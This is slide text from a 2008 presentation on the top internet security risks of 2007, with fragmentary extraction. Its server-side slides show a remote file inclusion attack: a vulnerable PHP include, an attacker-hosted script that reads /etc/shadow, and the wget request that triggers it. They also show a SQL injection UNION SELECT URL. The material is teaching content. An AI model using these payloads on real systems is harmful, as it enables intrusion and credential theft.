internet security

Yohann Lepage – Vincent Palierne

Top-10 2007 Security Risks

Wednesday 6th May 2008

INTERNET SECURITY

Summary

Client-side Vulnerabilities

ServerClient

Network(Internet)

Vulnerabilities

Softwares

Web Browsers

Email Clients

Media Players

Clients-Side Vulnerabilities

Server-Side Vulnerabilities

ServerClient

Network(Internet)

Vulnerabilities

Web Applications

Hacker www.mysite.com/index.php

<?php

include($page.'.php');

?>

Index.php

<?php passthru("cat /etc/shadow"); ?>

cat.php

www.badguy.ru/cat.php

$>wget www.mysite.com/index.php?page=www.haxor.com/cat Network

(Internet)

USER:PASSWORDroot:S5AçéZl~]Linus:@ée)&#$*^%Httpd:Jpzi5z@°

Www.mysite.com/indexindex.php

Vulnerabilities

Database Software

http://localhost/admin.php?module=news&id= -1 union select 0,1,database(),3,4,5,6,7 from membres--

Security Policy and Personal

Phishing/Spear Phishing

Application Abuse

Instant Messaging

I MI M

Peer-to-Peer Programs

Zero Day Attacks

Conclusion

Internet security is hard because :

End